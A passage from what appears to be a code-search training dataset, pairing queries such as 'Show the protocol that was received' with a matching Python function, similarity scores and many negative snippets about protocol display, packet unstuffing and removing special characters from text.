"def parse_command(self, command):\n \n #chcek operation type\n mod_type = re.findall('.*(rotate|translate|zoom|make|time).*',command)[0]\n \n #for each operation type recover necessary parameters\n if mod_type == 'rotate':\n angle = int(re.findall('.*rotate by (\\d+).*', command)[0])\n axis = list(map(int,re.findall('.*around \\((\\d+)\\,(\\d+)\\,(\\d+).*', command)[0]))\n\n #if the rotation angle is large split it into 3 to ensure the rotation is accomplished fully\n if angle >= 180:\n new_q = self.q.create_from_axis_angle(angle/3*2*np.pi/360, axis[0], axis[1], axis[2], degrees=False)\n result = [(mod_type, new_q),(mod_type, new_q),(mod_type, new_q)]\n else:\n new_q = self.q.create_from_axis_angle(angle*2*np.pi/360, axis[0], axis[1], axis[2], degrees=False)\n result = (mod_type, new_q)\n\n elif mod_type == 'zoom':\n factor = float(re.findall('.*factor of (\\d*\\.*\\d+).*', command)[0])\n result = (mod_type, factor)\n\n elif mod_type == 'translate':\n translate = np.array(list(map(int,re.findall('.*by \\((\\-*\\d+)\\,(\\-*\\d+)\\,(\\-*\\d+).*', command)[0])))\n result = (mod_type, translate)\n\n elif mod_type == 'make':\n layer = int(re.findall('.*make layer (\\d+).*', command)[0])\n vis_status = command.split()[-1]\n if vis_status == 'invisible':\n result = ('vis', layer, False)\n else:\n result = ('vis', layer, True)\n \n elif mod_type == 'time':\n time_shift = int(re.findall('.*by (\\-*\\d+).*', command)[0])\n result = (mod_type, time_shift)\n return result"
] | [
"0.7055916",
"0.6958671",
"0.6834779",
"0.6826811",
"0.66905415",
"0.6657784",
"0.66384405",
"0.65551907",
"0.64848095",
"0.6423199",
"0.641272",
"0.6404379",
"0.63837487",
"0.6381479",
"0.6360029",
"0.6312353",
"0.62964827",
"0.62884474",
"0.6237116",
"0.61567235",
"0.6149468",
"0.61375535",
"0.6101278",
"0.6091492",
"0.6086016",
"0.6063523",
"0.6063219",
"0.6038263",
"0.60172164",
"0.60132384",
"0.60032815",
"0.6003235",
"0.59938604",
"0.5974661",
"0.59681094",
"0.5924873",
"0.5896271",
"0.588834",
"0.58534807",
"0.58478004",
"0.5821719",
"0.581133",
"0.5806045",
"0.58000106",
"0.57829636",
"0.57612365",
"0.5753075",
"0.5751063",
"0.5737051",
"0.57324404",
"0.57207197",
"0.57199407",
"0.5713278",
"0.57089746",
"0.5698666",
"0.568274",
"0.5673011",
"0.56486756",
"0.56325567",
"0.5629906",
"0.56279016",
"0.56087756",
"0.56057507",
"0.56052405",
"0.55696034",
"0.55682856",
"0.55293924",
"0.5525873",
"0.5518849",
"0.5511666",
"0.55073494",
"0.55049455",
"0.5496324",
"0.54961395",
"0.54887086",
"0.5478929",
"0.54777396",
"0.5466431",
"0.5463021",
"0.54630107",
"0.5458271",
"0.545582",
"0.5454882",
"0.54524374",
"0.5450995",
"0.54450315",
"0.5442991",
"0.5441793",
"0.5438789",
"0.54334295",
"0.5430925",
"0.54267174",
"0.5421851",
"0.5410332",
"0.54095817",
"0.54090977",
"0.5406741",
"0.540568",
"0.5405286",
"0.54029065"
] | 0.8249946 | 0 |
Show the protocol that was received. | def __show_protocol__(self, data):
t_16 = t_16_Bit_Options()
t_8 = t_8_Bit_Options()
t_var = t_8_Bit_Options()
        print('Received ' + str(len(data)) + ' Bytes')
#----------------------------------------------------------------------
print('='*80)
print('Handling Protocol response: ' + hexlify(data))
#----------------------------------------------------------------------
print('='*80)
print('Overhead Bytes: ' + hexlify(data[:BP_TOOL.OVERHEAD]))
print('Number of UINT16 bitstream data = ' + str(data[BP_TOOL.UINT16S]))
print('Number of UINT8 bitstream data = ' + str(data[BP_TOOL.UINT8S]))
print('Number of var bitstream data = ' + str(data[BP_TOOL.VARS]))
print('Follow = ' + str(self.get_follow(data)))
print('Length = ' + str(self.get_length(data)))
start = self.get_follow_and_length(data)
end = start + BP_TOOL.SIZE_FOLLOW + BP_TOOL.SIZE_LEN
print('Following bytes and length = ' + hexlify(data[start:end]))
#----------------------------------------------------------------------
print('='*80)
bits = self.get_16bit_options_bits(data)
values = self.get_16bit_options(data)
options = self.get_options_requested(bits)
        # Display the options if they exist
if len(options):
print('UINT16 bits...... : ' + hexlify(bits))
print('UINT16 data...... : ' + hexlify(values))
print('UINT16 Num of opts ... : ' + str(len(values) // 2))
print('UINT16 options... : ' + str(options))
print('-'*80)
for x in range(len(options)):
value = (values[x*2] << 8) | (values[x*2 + 1])
opt = options[x]
t_16.set_value(opt, value)
print('Option: ' + t_16.options[opt]['name'] + ' ' + str(value))
pprint.pprint(t_16.options)
else:
print('No 16 bit options')
#----------------------------------------------------------------------
print('-'*80)
bits = self.get_8bit_options_bits(data)
values = self.get_8bit_options(data)
options = self.get_options_requested(bits)
        # Display the options if they exist
if len(options):
print('UINT8 bits...... : ' + hexlify(bits))
print('UINT8 data...... : ' + hexlify(values))
print('UINT8 options... : ' + str(options))
print('-'*80)
for x in range(len(options)):
value = values[x]
opt = options[x]
t_8.set_value(opt, value)
                print('Option: ' + t_8.options[opt]['name'] + ' ' + str(value))
pprint.pprint(t_8.options)
else:
print('No 8 bit options')
#----------------------------------------------------------------------
print('-'*80)
bits = self.get_var_options_bits(data)
values = self.get_var_options(data)
print('VARS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
        # Display the options if they exist
if len(values):
pprint.pprint(values)
else:
print('No var bit options')
print('VAR options... : ' + str(self.get_options_requested(bits)))
print('VARS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('-'*80) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def protocol_details(self) -> pulumi.Output['outputs.ServerProtocolDetails']:\n return pulumi.get(self, \"protocol_details\")",
"def protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"protocol\")",
"def getProtocol(self) -> str:\n ...",
"def protocol(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol_details(self) -> Optional[pulumi.Input['ServerProtocolDetailsArgs']]:\n return pulumi.get(self, \"protocol_details\")",
"def protocol_details(self) -> Optional[pulumi.Input['ServerProtocolDetailsArgs']]:\n return pulumi.get(self, \"protocol_details\")",
"def in_protocol(self) -> str:\n return pulumi.get(self, \"in_protocol\")",
"def protocol(self):\n return self._info.next # pylint: disable=E1101",
"def ProtocolInformation(self) -> _n_0_t_7[_n_0_t_6]:",
"def protocol(self):\n self._recv_protocol()\n return self._protocol",
"def protocol(self):\n ...",
"def v_protocol(self):\n return self._protocol",
"def v_protocol(self):\n return self._protocol",
"def protocol(self) -> str:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> str:\n return self.__parameters.protocol",
"def protocol(self):\n return self._protocol",
"def gotProtocol(self,p): \n p.send_hello()",
"def getProtocol(self, _):\r\n return self._protocol",
"def protocol(self):\n return helpers.get_protocol()",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def show_cdp(self):\n txt = \"\"\n for inf in self.interfaces:\n if self.interfaces[inf]['connect'] != ['none', 'none']:\n txt += \"%s interface %s connect to %s on interface %s\\n\"%(self.hostname, inf, self.interfaces[inf]['connect'][0], self.interfaces[inf]['connect'][1]) \n return txt",
"def protocol(self):\n v = uint16_packer.unpack(self[2:4])[0]\n mask = 0b111111111111\n return v & mask",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self):\n return self._host[CONF_PROTOCOL]",
"def proto(self):\n return self.sock.proto",
"def print_transferred_data(self):\n\n for protocol in self.protocols.itervalues():\n print \"Transfer to peer %d: %d bytes in %d packets\" % \\\n (protocol.peer_id, protocol.sent_bytes, protocol.sent_packets)",
"def showconnecttoapiserver():\n print('\\n{0}'.format(middleware.preference.apiServerType))",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def protocol(self) -> str:\n return __name__",
"def proxy_protocol(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"proxy_protocol\")",
"def protocol(self):\n\n raise NotImplementedError()",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def get_protocols(self):\r\n\r\n return None",
"def protocol(self) -> NetworkProtocol:\n if hasattr(self, \"_protocol\"):\n return self._protocol\n _args: list[Arg] = []\n _ctx = self._select(\"protocol\", _args)\n return _ctx.execute_sync(NetworkProtocol)",
"def Print(self, data, output=None):\n Console.ok(f\"PRINT: Using {Registry.PROTOCOL_NAME} Protocol\")\n self.protocol.Print(data, output)",
"async def status(self):\n cmd = subprocess.check_output([\"birdc\", \"show\", \"proto\"])\n for page in chat_formatting.pagify(cmd.decode(), ['\\n', ' '], shorten_by=12):\n await self.bot.say(chat_formatting.box(page))",
"def print_connection_being_established(pkt):\n print_headers(pkt, overwrite_min=0)\n print(green(\"!!!! New TCP/OpenFlow Connection being established!!\\n\"))",
"def protocol_type(self):\n return self._read(MX_PROTOCOL_TYPE)",
"def protocol(self) -> MessageProtocol:\n return self._sender.protocol",
"def protocol(self) -> Optional[pulumi.Input['TargetServerProtocol']]:\n return pulumi.get(self, \"protocol\")",
"def __str__(self):\n return self.socket.__str__()",
"def _printable(self):\n toPrint = \"Communication header. \"\n toPrint += \"Remote App ID: \" + str(self.remote_app_id) + \" \"\n toPrint += \"Remote Node: \" + str(self.remote_node) + \" \"\n toPrint += \"Remote Port: \" + str(self.remote_port) + \" \"\n\n return toPrint",
"def protocol(request):\n return request.param",
"def info(self):\n headers = self.headers and 'headers=%s' % self.headers\n body = self.body[:self.INFO_LENGTH]\n if body not in self.body:\n body = '%s...' % body\n body = body and ('body=%s' % repr(body))\n info = ', '.join(i for i in (headers, body) if i)\n return '%s frame%s' % (self.command, info and (' [%s]' % info))",
"def connectionMade(self):\n print \"connection received from\", self.addr",
"def print_srv(msg):\n\tprint \"Server:\", \" >> \", msg",
"def __str__(self):\n return describe_connection(self)",
"def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for",
"def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for",
"def action_GetProtocolInfo(self, extract_returns=True):\n arguments = { }\n\n out_params = self._proxy_call_action(\"GetProtocolInfo\", arguments=arguments)\n\n rtn_args = out_params\n if extract_returns:\n rtn_args = [out_params[k] for k in (\"Source\", \"Sink\",)]\n if len(rtn_args) == 1:\n rtn_args = rtn_args[0]\n\n return rtn_args",
"def _build_protocol(self):\n self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)",
"def print_info(self):\n \n print \"\"\"version: %d\\t header_len: %d\\t tos: %s\\t total_len: %d\n id: %s\\t flags_reservedbit: %d\\t flags_dont_fragment: %d\\t flags_more_fragment: %d\n fragment_offset: %d\\t TTL: %d\\t protocol: %s\\t\n header_checksum: %s\\t\n src: %s\\t dst: %s\n opt_paddings: %s\"\"\" % (\n self.version, self.header_len, self.type_of_service, self.total_len, self.id, self.flags_reservedbit, \n self.flags_dont_fragment, self.flags_more_fragment, \n self.fragment_offset, self.TTL, self.protocol, self.header_checksum, self.src, self.dst, repr(self.opt_paddings))",
"def protocols(self) -> pulumi.Output['outputs.ServiceProtocols']:\n return pulumi.get(self, \"protocols\")",
"def print_connection_information(self):\n try:\n print(self.connection_information)\n except:\n print(\"Error in displaying connection information.\")",
"def protocol_names(self):\n l = self.protocols()\n retval = [str(k.name) for k in l]\n return retval",
"def showInfo(self):\n print(\n f\"Preferences: {stripnl(MessageToJson(self.radioConfig.preferences))}\\n\")\n self.showChannels()",
"def sipserver_status(self) -> str:",
"def FlowStatIpProtocol(self):\n\t\treturn self._get_attribute('flowStatIpProtocol')",
"def displayTCP(tcp):\n\n print \"[TCP Header]\"\n print \"\\t Source Port: \" + str(tcp.sport)\n print \"\\t Destination Port: \" + str(tcp.dport)\n print \"\\t Sequence Number: \" + str(tcp.seq)\n print \"\\t Acknowledgment Number: \" + str(tcp.ack)\n print \"\\t Data Offset: \" + str(tcp.dataofs)\n print \"\\t Reserved: \" + str(tcp.reserved)\n print \"\\t Flags: \" + tcp.underlayer.sprintf(\"%TCP.flags%\")\n print \"\\t Window Size: \" + str(tcp.window)\n print \"\\t Checksum: \" + str(tcp.chksum)\n if (tcp.flags & URG):\n print \"\\t Urgent Pointer: \" + str(tcp.window)\n if (tcp.dataofs > 5):\n print \"\\t Options: \" + str(tcp.options)",
"def port_show(switch, port):\n print client.port.show(switch, port)",
"def do_protocol_version(self):\n return \"2\", True",
"def _recv_protocol(self):\n if not self._protocol_recv:\n try:\n data = self._read_bytes(1, timeout=1.0)\n if len(data) == 0:\n self.close()\n raise PipeClosed()\n peer_protocol = struct.unpack('>B', data)[0]\n self._protocol = min(self._protocol or pickle.HIGHEST_PROTOCOL, peer_protocol)\n self._protocol_recv = True\n self._serializer = _PickleSerializer(self._protocol)\n except (OSError, socket.error):\n self.close()\n raise PipeClosed()",
"def printMixData(self):\n\t\tprint \"OPERATED MIXNODE: Name: %s, address: (%d, %s), PubKey: %s\" % (self.name, self.port, self.host, self.pubk)",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def pprint(self):\n ParseHub.pprint(self)",
"def pprint(self):\n ParseHub.pprint(self)",
"def debug_output(self):\n return self._packet.get('debug-output', 'warning')",
"def protocol_output(self, message, req=None):\n try:\n # so, utf16 doubles the size of the FLAP packets, which\n # really limits our max message size. if none of the ordinals\n # are outside the 7bit ascii range, convert to ascii bytes\n if not [ch for ch in message if ord(ch) > 127]:\n message = message.encode('us-ascii')\n\n # i don't know what's going on here anymore.. let's try something\n # completely different!\n message = message.replace('&', '&')\n message = message.replace('<', '<')\n message = message.replace('>', '>')\n message = newline_re.sub('<br>', message)\n\n # AIM reacts indignantly to overlong messages, so we need to\n # wrap. try not to break up html tags injected by colorlib.\n if not hasattr(req, 'chat'):\n req.chat = None\n if not hasattr(req, 'aim'):\n req.aim = self.oscar_connection\n\n if req.chat:\n width = 2048\n func = req.chat.sendMessage\n else:\n width = 2545 # longer than chatrooms, who knows...\n func = req.aim.sendMessage\n\n # unicode stuff takes two bytes due to shitty utf-16\n if isinstance(message, unicode):\n width = int(width / 2) - 1\n\n for line in self.xmlwrap(message, width):\n args = [line]\n if not req.chat:\n if not req.nick:\n req.nick = req.sendto\n args.insert(0, req.nick)\n reactor.callFromThread(func, *args)\n\n # don't spam ourselves off the server\n sleep(1)\n\n except Exception, error:\n self.log.exception(error)",
"def showmessage(self):\n return self.message",
"def showmessage(self):\n return self.message",
"def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))",
"def dataReceived(self, data):\n print \"received:\", data",
"def __str__(self):\n return self.port",
"def ProtocolType(self) -> ProtocolType:",
"def description(self):\n return f'# {self._peer.description}'",
"def _build_protocol(self):\n self._protocol = SBE19Protocol(Prompt, NEWLINE, self._driver_event)",
"def identify_client(self,protocol):\n if protocol.resident:\n return protocol.peer\n #pdb.set_trace()",
"def getLine(self):\r\n # This is important: \r\n # The data that is transmitted over the socket (the entire contents \r\n # of one protocol message will be put into one string of bytes that\r\n # is terminated by exactly one newline character 0x0a at the end.\r\n # \r\n # This string of bytes is what I refer to as the \"line\"\r\n #\r\n # Therefore the entire message data (the contents of ProtocolMsg.blob)\r\n # which can contain any arbitrary byte sequence (even chat messages are \r\n # considered a blob since they are UTF-8 text with arbitrary formatting \r\n # chars) will be properly encoded for transmission in such a way that \r\n # it will not contain any 0x0a bytes anymore.\r\n #\r\n # This is implemented in the functions encodeLF() and decodeLF()\r\n #\r\n # getLine() is called right before transmitting it over the socket\r\n # to produce the \"line\" and the exact inverse operation on the \r\n # receiving side will happen in __init__() when a new message object \r\n # is constructed from the incoming encoded line string. \r\n return \"%s %s\\n\" % (self.command, encodeLF(self.blob))",
"def __repr__(self):\n return f\"{self.host}/{self.iface}\"",
"def protocol(self) -> Optional['ListenerProtocol']:\n return pulumi.get(self, \"protocol\")",
"def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"protocols\")",
"def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)",
"def tracker_print(msg: Any) -> None:\n collective.communicator_print(msg)",
"def protocol(ver):\r\n if ver == 1:\r\n return 1\r\n\r\n if ver == 2:\r\n return 2\r\n\r\n\r\n raise ValueError",
"def display_network_architecture(self):\n self.log(\"\\n-------- Network architecture --------\")\n self.log(\"y_res: {}\".format(self.y_res))\n self.log(\"x_res: {}\".format(self.x_res))\n self.log(\"n_input_channels: {}\".format(self.n_input_channels))\n self.log(\"n_output_classes: {}\".format(self.n_output_classes))\n self.log(\"fc1_n_chan: {}\".format(self.fc1_n_chan))\n self.log(\"fc1_dropout: {}\".format(self.fc1_dropout))\n self.log(\"alpha: {}\".format(self.alpha))\n self.log(\"n_samples_trained: {}\".format(self.n_samples_trained))\n for c in range(self.n_output_classes):\n self.log( \" * Class {}, m = {}\".format( \\\n c, self.n_class_samples_trained[c] ) )",
"def __repr__(self):\n return \"{}:{}\".format(self.ip, self.port)",
"def __str__(self):\n from ansys.dpf.core.core import _description\n\n return _description(self._message, self._server)",
"def get_status_line(self):\n return f'{str(self.protocol)} {int(self.status)} {self.status.phrase}'",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def response(self, data, response_type = \"terminal\"):\n if (response_type == \"terminal\"):\n print(data, end=\"\\n\")",
"def show(self):\n\n print(\"\\n---------------------------------------------------------\")\n\n print(\"\\n{0}\".format(self.name))\n print(\"\\n\\tMonitoring the following Mechanism OutputPorts:\")\n if self.objective_mechanism is None:\n print(\"\\t\\tNone\")\n else:\n for port in self.objective_mechanism.input_ports:\n for projection in port.path_afferents:\n monitored_port = projection.sender\n monitored_port_Mech = projection.sender.owner\n monitored_port_index = self.monitored_output_ports.index(monitored_port)\n\n weight = self.monitored_output_ports_weights_and_exponents[monitored_port_index][0]\n exponent = self.monitored_output_ports_weights_and_exponents[monitored_port_index][1]\n\n print(\"\\t\\t{0}: {1} (exp: {2}; wt: {3})\".\n format(monitored_port_Mech.name, monitored_port.name, weight, exponent))\n\n print(\"\\n\\tModulating the following parameters:\".format(self.name))\n # Sort for consistency of output:\n port_Names_sorted = sorted(self.output_ports.names)\n for port_Name in port_Names_sorted:\n for projection in self.output_ports[port_Name].efferents:\n print(\"\\t\\t{0}: {1}\".format(projection.receiver.owner.name, projection.receiver.name))\n\n print(\"\\n---------------------------------------------------------\")",
"def _build_protocol(self):\n self._protocol = Protocol(MENU, Prompt, NEWLINE, self._driver_event)",
"def transmission(self):\n return 1"
] | [
"0.7430098",
"0.72326285",
"0.72326285",
"0.7058655",
"0.70196545",
"0.694914",
"0.694914",
"0.68412536",
"0.6835205",
"0.67115223",
"0.6701628",
"0.66536134",
"0.66198826",
"0.66198826",
"0.6572238",
"0.642882",
"0.64042336",
"0.6377508",
"0.62557447",
"0.62252337",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6182007",
"0.6151151",
"0.6140062",
"0.6099098",
"0.60828763",
"0.6078998",
"0.60441965",
"0.60126865",
"0.59970367",
"0.59405273",
"0.59400046",
"0.5913577",
"0.5849608",
"0.58413535",
"0.5808534",
"0.58025205",
"0.57809514",
"0.5776252",
"0.5761826",
"0.572554",
"0.56994873",
"0.56963205",
"0.5658754",
"0.5633283",
"0.56251365",
"0.5620041",
"0.561534",
"0.560827",
"0.5599502",
"0.5593594",
"0.5591934",
"0.5591934",
"0.5555217",
"0.55264795",
"0.5518062",
"0.5515055",
"0.551498",
"0.5501328",
"0.54905725",
"0.54883033",
"0.5487145",
"0.54742545",
"0.5468446",
"0.54568046",
"0.54292065",
"0.54254824",
"0.5417989",
"0.5404604",
"0.5404604",
"0.5403732",
"0.53801674",
"0.5376197",
"0.5376197",
"0.537476",
"0.5373101",
"0.5366069",
"0.53625137",
"0.53615606",
"0.5353493",
"0.53337336",
"0.5333262",
"0.53293824",
"0.5327784",
"0.53194827",
"0.53167605",
"0.5310121",
"0.5310103",
"0.5298675",
"0.52964956",
"0.5292129",
"0.5279716",
"0.5278387",
"0.52762073",
"0.5275503",
"0.5271957",
"0.5270356"
] | 0.6732168 | 9 |
remove the special characters for stuffing | def __packet_unstuff(self, data):
unstuffed = bytearray()
escape = False
for count in data:
if escape == False:
if count == 0x7e:
continue
if count == 0x7f:
continue
if count == 0x7d:
escape = True
else:
unstuffed.append(count)
else:
unstuffed.append(count + 0x7d)
escape = False
return(unstuffed) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)",
"def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text",
"def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text",
"def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text",
"def remove_special_characters(string_list):",
"def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet",
"def strip_other_charcter():\n pass",
"def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text",
"def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence",
"def remove_punct(self,text):",
"def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)",
"def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet",
"def remove_special_characters(text):\n soup = BeautifulSoup(text, \"html.parser\")\n review = soup.get_text()\n review = r\"[^a-zA-z0-9\\s]\"\n review = re.sub(review, \"\", text)\n return review.lower()",
"def remove_special(s):\n return ansi_escape_chars.sub('', s)",
"def replace_special(text):\r\n text = text.replace('\\r\\n', ' ')\r\n text = text.replace('\\n', ' ')\r\n text = text.replace('``', \"''\")\r\n text = text.replace('`', \"'\")\r\n text = text.replace('“', '\"')\r\n text = text.replace('”', '\"')\r\n text = text.replace('’', \"'\")\r\n text = text.replace('‘', \"'\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('–', \"-\")\r\n text = text.replace('\\\"', '\"')\r\n text = text.replace(\"\\'\", \"'\")\r\n return text",
"def remove_special_characters_from_text(text) -> str:\n return re.sub(r'[^\\w\\s]', '', text.strip())",
"def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)",
"def remove_extra_characters(self, text):\n if text:\n parsed_text = text\n parsed_text = parsed_text.replace(\"[\", \"\")\n parsed_text = parsed_text.replace(\"]\", \"\")\n parsed_text = parsed_text.replace(\"{\", \"\")\n parsed_text = parsed_text.replace(\"}\", \"\")\n parsed_text = parsed_text.replace(\"|\", \" \")\n parsed_text = parsed_text.replace(\"-\", \"\")\n parsed_text = parsed_text.replace(\" \", \"\")\n parsed_text = parsed_text.replace(\":'\", \"\")\n parsed_text = parsed_text.replace(\"'\", \"\")\n parsed_text = parsed_text.replace(\"#\", \"\")\n parsed_text = parsed_text.replace(\"':\", \"\")\n parsed_text = parsed_text.replace(\"=\", \"\")\n parsed_text = parsed_text.replace(\"*\", \"\")\n parsed_text = parsed_text.replace(\"/\", \"\")\n parsed_text = parsed_text.replace(\"<--\", \"\")\n parsed_text = parsed_text.replace(\"-->\", \"\")\n parsed_text = parsed_text.replace(\"<!--\", \"\")\n parsed_text = parsed_text.replace(\">\", \"\")\n parsed_text = parsed_text.replace(\"<\", \"\")\n\n parsed_text = parsed_text.replace('__NOTOC__', '')\n\n return parsed_text",
"def remove_specials(sentence):\n sentence = sentence.replace('-', ' ')\n sentence = re.sub(r'[^\\w\\s]', '', sentence)\n return sentence",
"def remove_special_chars(s):\n stripped = re.sub('[^\\w\\s]', ' ', s)\n stripped = re.sub('_', ' ', stripped)\n\n # Make all whitespaces only one space\n stripped = re.sub('\\s+', ' ', stripped)\n\n stripped = stripped.strip()\n\n return stripped",
"def string_cleanup(s, garbage=\":,-()&\"):\n s_new = ''\n for x in s:\n if x not in garbage:\n s_new += x\n\n return s_new",
"def replace_special_chars(self, word):\n try:\n if (self.lang==\"tr\"):\n word = re.sub(u\"\\^db\", u\"+db\", word)\n word = re.sub(u\"\\^\", u\"¬\", word)\n word = re.sub(u\"\\$\", u\"£\", word)\n except UnicodeDecodeError:\n word = ''\n return word",
"def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")",
"def get_clean_text(messy_text: str) -> str:\n new_text = \"\"\n replace = {\n \"*\": \"\\\"\",\n \"!\": \"?\",\n \"/\": ',',\n \"?\": \"!\"\n }\n remove = \"1234567890&@#$%^()_+|><~\"\n pls_do_upper = False\n for l in messy_text:\n if l in replace:\n new_text += replace[l]\n elif l not in remove:\n if pls_do_upper:\n new_text += l.upper()\n else:\n new_text += l\n return new_text",
"def clean(sent):\n p1 = re.compile('\\W')\n p2 = re.compile('\\s+')\n sent = re.sub(r\"http\\S+\", \"\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n sent = re.sub(r'[A-Za-z0-9]', r'', sent)\n sent = re.sub(p1, ' ', sent)\n sent = re.sub(p2, ' ', sent)\n return sent",
"def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data",
"def remove_special_chars(sentence):\r\n result = re.sub(r\"[^a-zA-Z0-9.]+\", ' ', re.sub('\\.\\.+', ' ', sentence))\r\n return result",
"def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text",
"def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()",
"def remove_special_characters(text, remove_digits=False):\n pattern = r'[^a-zA-z0-9\\s]' if not remove_digits else r'[^a-zA-z\\s]'\n text = re.sub(pattern, '', text)\n return text",
"def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line",
"def cleanXMLfromSpecialChars(self,line):\n return str(line).replace(\"&\", \"&\").replace(\"\\\"\",\""\").replace(\"<\",\"<\").replace(\">\",\">\").replace(\"'\",\"'\")",
"def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt",
"def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text",
"def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text",
